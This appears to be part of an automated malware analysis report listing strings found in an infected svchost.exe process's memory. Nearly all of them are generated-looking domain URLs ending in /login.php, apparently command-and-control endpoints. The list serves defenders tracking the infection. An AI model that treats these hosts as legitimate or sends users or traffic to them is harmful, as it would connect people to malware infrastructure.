    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyzik.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571760881.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572347072.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2581882189.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybut.com/login.php
    Source: svchost.exe, 00000001.00000003.2574085789.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577542227.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571204681.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2580215394.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volycem.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793112586.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795133904.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volycik.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volycik.com/login.phpM
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volycik.com/login.phpe
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydyk.com/
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561990237.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574290902.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydyk.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545030147.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygoc.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyf.com/
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyf.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyt.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815952553.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjym.com/http://volyjym.com/
    Source: svchost.exe, 00000001.00000003.2591407589.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590376804.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2584954171.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2587032429.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2583975866.00000000072F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volykek.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523370839.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814952372.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809764585.0000000007253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809902914.000000000733B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volykit.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599995293.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymuc.com/login.php
    Source: svchost.exe, 00000001.00000003.2574659514.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2835961971.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2582651634.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.00000000073A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypum.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2524978481.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809902914.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.000000000735E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyquk.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrac.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrut.com/login.php
    Source: svchost.exe, 00000001.00000003.2802565524.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803526533.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800699213.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzef.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979374488.0000000007200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837121931.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2582339927.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonydem.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjef.com/login.php
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636466156.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2629381703.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjuc.com/login.php
    Source: svchost.exe, 00000001.00000003.2612043609.0000000005F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2614746889.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613993664.00000000073B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonykam.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2830112848.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2830563308.000000000724E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/login.php
    Source: svchost.exe, 00000001.00000003.2808095561.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypyf.com/http://galykiz.com/
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2810277870.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypyf.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqof.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqok.com/
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815952553.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzac.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867102202.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzut.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybok.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598474329.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycoc.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopydaf.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2835961971.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyjac.com/login.php
    Source: svchost.exe, 00000001.00000003.2536042650.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545206078.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535694034.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopypec.com/
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613424581.000000000734D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613994929.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyput.com/login.php
